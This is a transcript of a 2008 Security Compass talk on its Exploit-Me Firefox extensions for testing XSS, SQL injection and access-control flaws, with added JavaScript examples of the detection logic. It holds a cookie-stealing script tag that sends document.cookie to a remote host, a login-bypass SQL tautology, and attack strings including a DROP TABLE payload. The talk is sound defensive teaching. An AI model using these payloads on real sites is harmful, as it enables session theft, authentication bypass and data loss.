TRANSCRIPT
© 2008 Security Compass inc.

Slide 1: Firefox Plug-ins for Application Penetration Testing
Exploit-Me
Slide 2: Who are we?
• Tom Aratyn – Software Developer at Security Compass
  – Developed the Exploit-Me tools
Slide 3: Who are we?
• Jamie – Security Consultant for Security Compass
  – Background in security research, penetration testing, and software development
Slide 4: Agenda
• Cross-site scripting, really a danger?
• State of web application security
• XSS-Me
• SQL Inject-Me
• Access Me
Slide 5: XSS – Really a Danger?
• We know XSS can be dangerous, but can we use it to rob a bank?
  – AJAX + CSRF + XSS = major problem
Slide 6: Two Exciting Flavours
• Reflected
  – Spat back as soon as it goes in
  – XSS-Me helps here
• Stored
  – Saved and served to someone else later
  – XSS-Me future version
Slide 7: What is this XSS Stuff
• Un-validated user input executed in the user's browser
• JavaScript is typically used
  – PDF files are XSS-able too
• Someone took my cookie:

<SCRIPT>location.href="http://10.1.1.1/cgi-bin/steal.cgi?"+escape(document.cookie);</SCRIPT>
Slide 8: Someone Changed my App
• AJAX is adding a new element to these attacks
  – AJAX was used in the IBDBank attack
• Attacker can play with data as if the victim is doing it
  – Send
  – Receive
  – Parse
Slide 9: State of Web App Insecurity
• Web app exploits outnumber buffer overflows in CVE
• A large portion of web apps suffer from XSS or SQL Injection
Slide 10: Testing Tools
• Various tools exist
  – OWASP tools, commercial, open source
• Work very well
  – For what they were built to do
Slide 11: The Missing Piece
• Most tools are not built for developers or QA
• Developers and QA must be checking for security vulnerabilities
• Need lightweight tools
Slide 12: XSS-Me 0.4 to the Rescue
• Firefox extension to test for cross-site scripting
Slide 13: XSS-Me Features
• Pick forms & fields to test
• Firefox 3
• Import/export/add/remove XSS strings
• Test & Surf
• Heuristics to limit tests
Slide 14: Heuristics?
• Checking all attacks against all fields is slow.
  – No, trust me, it's slow
• Heuristic tests limit the fields we have to check by determining whether we can inject into them
  – Passes a set of characters (;\/<>='") and checks whether they come back in the response
Slide 15: Behind the Magic
• Attack strings attempt to set document.vulnerable=true in the DOM
• If the property is set, the attack worked
• Also checks for the plain-text attack string, a potential vulnerability
  – e.g. OnMouseOver injection
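How the two steps on slides 14 and 15 fit together, as an added example that is not XSS-Me's own code: a marker-wrapped probe of the slide's character set is submitted, only the characters that come back unencoded count as reflected (an entity-encoded echo such as &lt; is a filtered one), fields that echo tag delimiters or a quote get the full attack-string run, and each attack result is classified by the document.vulnerable flag or by a verbatim echo. The marker text, the "worth testing" rule, the result labels and the two sample responses are this example's assumptions.

```javascript
'use strict';

// Added example, not XSS-Me's own code: the reflection heuristic (slide 14) and the result
// classification (slide 15). Marker, "worth testing" rule and sample pages are assumptions.

// The probe character set the slide lists: ; \ / < > = ' "
const PROBE_CHARS = [';', '\\', '/', '<', '>', '=', "'", '"'];

// Wrap the probe in a marker so we locate our own echo rather than some other '<' on the page.
function buildProbe(marker) {
  return marker + PROBE_CHARS.join('') + marker;
}

// Entity-encoded echoes (&lt; &gt; &quot; &#39; &#x27; ...) are filtered, not reflected,
// so strip entity sequences before looking for raw probe characters.
function stripEntities(text) {
  return text.replace(/&(?:#\d+|#x[0-9a-fA-F]+|[a-zA-Z]+);/g, '');
}

// Which probe characters came back unencoded in the response to one field's probe.
function reflectedChars(html, marker) {
  const found = new Set();
  let start = html.indexOf(marker);
  while (start !== -1) {
    const end = html.indexOf(marker, start + marker.length);
    if (end === -1) break;
    const echoed = stripEntities(html.slice(start + marker.length, end));
    for (const ch of PROBE_CHARS) {
      if (echoed.includes(ch)) found.add(ch);
    }
    start = html.indexOf(marker, end + marker.length);
  }
  return found;
}

// Heuristic (assumed rule): only fields that echo both tag delimiters, or a quote that can
// break out of an attribute, are worth the full attack-string run.
function worthTesting(reflected) {
  return (reflected.has('<') && reflected.has('>')) || reflected.has('"') || reflected.has("'");
}

// Outcome of one real attack string. `vulnerableFlag` is document.vulnerable as read from the
// page loaded after the form was submitted; the attack strings set it when they execute.
function classifyAttack(html, attack, vulnerableFlag) {
  if (vulnerableFlag === true) return 'executed';   // script ran: vulnerable
  if (html.includes(attack)) return 'reflected';     // echoed verbatim: potential (e.g. onmouseover)
  return 'not reflected';
}

// Constructed responses: one field is entity-encoded on output, the other is echoed raw.
const MARKER = 'xssme7';
const PROBE = buildProbe(MARKER);
const ENCODED_PAGE =
  '<input name="q" value="' + MARKER + ';\\/&lt;&gt;=&#39;&quot;' + MARKER + '">';
const RAW_PAGE = '<p>You searched for ' + PROBE + '</p>';

function demo() {
  const encoded = reflectedChars(ENCODED_PAGE, MARKER);
  const raw = reflectedChars(RAW_PAGE, MARKER);
  return {
    encoded: [...encoded],                 // ; \ / = came back, the dangerous ones did not
    raw: [...raw],                         // every probe character came back
    encodedWorthTesting: worthTesting(encoded),
    rawWorthTesting: worthTesting(raw),
  };
}

console.log(demo());
```

The entity stripping matters in practice: `&#39;` contains a `;`, so a naive "is the character in the response" check would report the semicolon as reflected for a field that is actually encoded correctly.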
Slide 16: Thank $deity for Struts
• Everyone says use Struts to protect yourself
  – Sure, just don't follow the supplied examples
Slide 17: Being Bobby
(Cartoon courtesy XKCD.com)

sql = "SELECT * FROM users WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"

User input:
  username = jimmy
  password = blah' OR '1'='1

Resulting query:
SELECT * FROM users WHERE username = 'jimmy' AND password = 'blah' OR '1'='1'

AND binds tighter than OR, so the WHERE clause reads (username = 'jimmy' AND password = 'blah') OR '1'='1'. Since '1'='1' is true for every record, the entire table is returned!
Slide 18: No Excuse
• The defence is well known and faster than what you're doing now
  – Prepared statements
  – Stored procedures
• OK, if you use exec (dynamic SQL) inside your procedure this is also vulnerable, but you're not doing that, right?
Slide 19: SQL Inject-Me 0.4
• Firefox extension to check for SQL injection
Slide 20: SQL Inject-Me Features
• Pick what you test
• Configure attack and success strings
• Large default string set
• Firefox 3
• Test & Surf
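The "Being Bobby" query (slide 17) and the attack-string / success-string matching on the features slide, as an added example that is not SQL Inject-Me's own code. It rebuilds the slide's concatenation in JavaScript, shows structurally why the tautology works (a quote-aware tokenizer finds an extra OR that the database will parse as SQL rather than data), and then runs a small set of attack strings against a stand-in for the application, flagging responses that match database error signatures. The attack strings, error signatures, fake server and sample responses are this example's assumptions, not the tool's default lists.

```javascript
'use strict';

// Added example, not SQL Inject-Me's own code. Attack strings, error signatures and the
// fake server below are assumptions for the demonstration.

// The vulnerable construction from the "Being Bobby" slide (same concatenation, in JavaScript).
function buildLoginQuery(username, password) {
  return "SELECT * FROM users WHERE username = '" + username +
         "' AND password = '" + password + "'";
}

// Split SQL into whitespace-separated tokens, but never inside a '...' string literal
// (a doubled '' inside a literal is an escaped quote). Anything that survives as a bare
// token is something the database interprets as SQL, not as data.
function tokenizeOutsideStrings(sql) {
  const tokens = [];
  let cur = '';
  let inString = false;
  for (let i = 0; i < sql.length; i++) {
    const ch = sql[i];
    if (ch === "'") {
      if (inString && sql[i + 1] === "'") { cur += "''"; i++; continue; }
      inString = !inString;
      cur += ch;
    } else if (!inString && /\s/.test(ch)) {
      if (cur) tokens.push(cur);
      cur = '';
    } else {
      cur += ch;
    }
  }
  if (cur) tokens.push(cur);
  return tokens;
}

// Boolean operators that reached the parser. The template has exactly one (AND); anything
// extra means the input changed the structure of the query, which is what injection is.
function booleanOperators(sql) {
  return tokenizeOutsideStrings(sql)
    .map((t) => t.toUpperCase())
    .filter((t) => t === 'AND' || t === 'OR');
}

// SQL Inject-Me style detection: submit attack strings, match each response against the
// configured "success" strings (database error signatures).
const ATTACK_STRINGS = ["'", "' OR '1'='1", "' OR 1=1 --", '1; DROP TABLE users --'];
const SUCCESS_STRINGS = [
  /you have an error in your sql syntax/i,
  /unclosed quotation mark/i,
  /quoted string not properly terminated/i,
  /ORA-\d{5}/,
  /SQLSTATE\[/,
  /syntax error/i,
];

function matchSuccessStrings(responseBody) {
  return SUCCESS_STRINGS.filter((re) => re.test(responseBody)).map((re) => re.source);
}

// `submit` sends one attack string in the field under test and returns the response body.
function runAttacks(submit) {
  return ATTACK_STRINGS.filter((attack) => matchSuccessStrings(submit(attack)).length > 0);
}

// Constructed responses: what a classic ASP page might return for a stray quote, and the
// normal failed-login page. The fake server errors whenever the input contains a quote.
const ERROR_RESPONSE =
  "<html><body>Microsoft OLE DB Provider for SQL Server error '80040e14'<br>" +
  "Unclosed quotation mark before the character string ''.</body></html>";
const CLEAN_RESPONSE = '<html><body>Invalid username or password.</body></html>';
const fakeServer = (input) => (input.includes("'") ? ERROR_RESPONSE : CLEAN_RESPONSE);

function demo() {
  const benign = buildLoginQuery('jimmy', 'blah');
  const tautology = buildLoginQuery('jimmy', "blah' OR '1'='1");
  return {
    benignOperators: booleanOperators(benign),        // ['AND']
    tautologyOperators: booleanOperators(tautology),  // ['AND', 'OR']: structure changed
    errorHits: matchSuccessStrings(ERROR_RESPONSE),
    cleanHits: matchSuccessStrings(CLEAN_RESPONSE),
    flagged: runAttacks(fakeServer),                  // the three quote-bearing strings
  };
}

console.log(buildLoginQuery('jimmy', "blah' OR '1'='1"));
console.log(demo());
```

The tokenizer is the point: with a prepared statement the value `blah' OR '1'='1` never reaches the parser as text, so the operator count cannot change. Success strings based on error text only catch the noisy cases; a query that succeeds with altered logic (the tautology login) produces no error and needs a content or timing check instead.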
Slide 21: What's your method?
• Web/application servers may be vulnerable to HTTP verb tampering attacks
• Bypasses common authorization configurations
Slide 22: Access Me 0.2
• Firefox extension to check for access control (authentication and authorization) issues
Slide 23: Access Me Features
• Checks for unauthenticated access vulnerabilities
• Checks for HTTP verb vulnerabilities
• Regular-expression-based parameter detection
• Automatic test as you surf
Slide 24: Detecting Access Vulnerabilities
• Failed if the response status is 200 and the response is too similar to the original (authenticated) one
• Warning if the response status is 200 or the response is too similar, but not both
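The probes behind the two Access Me checks and the Failed / Warning / Passed rule above, as an added example that is not Access Me's own code: the original request is replayed without its credentials and again with each alternative verb, and every response is compared against the authenticated baseline. The verb list, the word-based Dice similarity, the 0.9 threshold and the constructed traffic are this example's assumptions; the deck does not say how Access Me measures "too similar".

```javascript
'use strict';

// Added example, not Access Me's own code. Verb list, similarity measure, threshold and the
// sample request/responses are assumptions for the demonstration.

// Unauthenticated check: replay the request with session cookie and Authorization removed.
function unauthenticatedVariant(request) {
  const headers = { ...request.headers };
  delete headers.Cookie;
  delete headers.Authorization;
  return { ...request, headers, label: 'no credentials' };
}

// Verb tampering check: same URL and credentials, different (or bogus) method. A filter that
// only names GET and POST may let HEAD or an unknown verb through to the handler.
function verbTamperingVariants(request) {
  const verbs = ['GET', 'POST', 'HEAD', 'PUT', 'DELETE', 'OPTIONS', 'TRACE', 'FOO'];
  return verbs
    .filter((v) => v !== request.method.toUpperCase())
    .map((v) => ({ ...request, method: v, label: 'verb ' + v }));
}

// Tag-stripped, lower-case word tokens of a response body.
function wordTokens(body) {
  return body.toLowerCase().replace(/<[^>]*>/g, ' ').split(/[^a-z0-9]+/).filter(Boolean);
}

// Sørensen-Dice coefficient over word multisets: 1.0 identical, 0.0 nothing in common.
function similarity(bodyA, bodyB) {
  const a = wordTokens(bodyA);
  const b = wordTokens(bodyB);
  if (a.length === 0 && b.length === 0) return 1;
  const remaining = new Map();
  for (const t of a) remaining.set(t, (remaining.get(t) || 0) + 1);
  let common = 0;
  for (const t of b) {
    const n = remaining.get(t) || 0;
    if (n > 0) { common += 1; remaining.set(t, n - 1); }
  }
  return (2 * common) / (a.length + b.length);
}

// The slide's rule. `baseline` is the authenticated response; `probe` is what the variant got.
function classify(baseline, probe, threshold = 0.9) {
  const tooSimilar = similarity(baseline.body, probe.body) >= threshold;
  const is200 = probe.status === 200;
  if (is200 && tooSimilar) return 'FAILED';
  if (is200 || tooSimilar) return 'WARNING';
  return 'PASSED';
}

// Constructed traffic for a page that should require a login.
const REQUEST = {
  method: 'GET',
  url: 'https://bank.example/account',
  headers: { Cookie: 'JSESSIONID=abc123' },
};
const BASELINE = {
  status: 200,
  body: '<h1>Account summary</h1><p>Balance: 1200</p><a href="/transfer">Transfer</a>',
};
const RESPONSES = {
  'no credentials': { status: 302, body: '<p>Redirecting to login</p>' },
  'verb HEAD': { status: 200, body: BASELINE.body },            // filter only covered GET/POST
  'verb FOO': { status: 403, body: BASELINE.body },             // blocked, yet the page leaked
  'verb POST': { status: 200, body: '<h1>Please log in</h1>' }, // 200, but a different page
};

function runChecks() {
  const probes = [unauthenticatedVariant(REQUEST), ...verbTamperingVariants(REQUEST)];
  const results = {};
  for (const p of probes) {
    const resp = RESPONSES[p.label] || { status: 405, body: 'Method Not Allowed' };
    results[p.label] = classify(BASELINE, resp);
  }
  return results;
}

console.log(runChecks());
```

The two WARNING cases show why the rule has a middle tier: a 200 with a different body is usually the login page being served in place of the resource, while a non-200 status with the same body means the server said no but sent the protected content anyway.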
Slide 25: Where can you get 'em
• Available off our website
  – www.securitycompass.com
• Extra XSS-Me attack strings also available from the site
• Open sourced under GPL v3
Slide 26: The Future...
• May include
  – Spidering
  – Stored attacks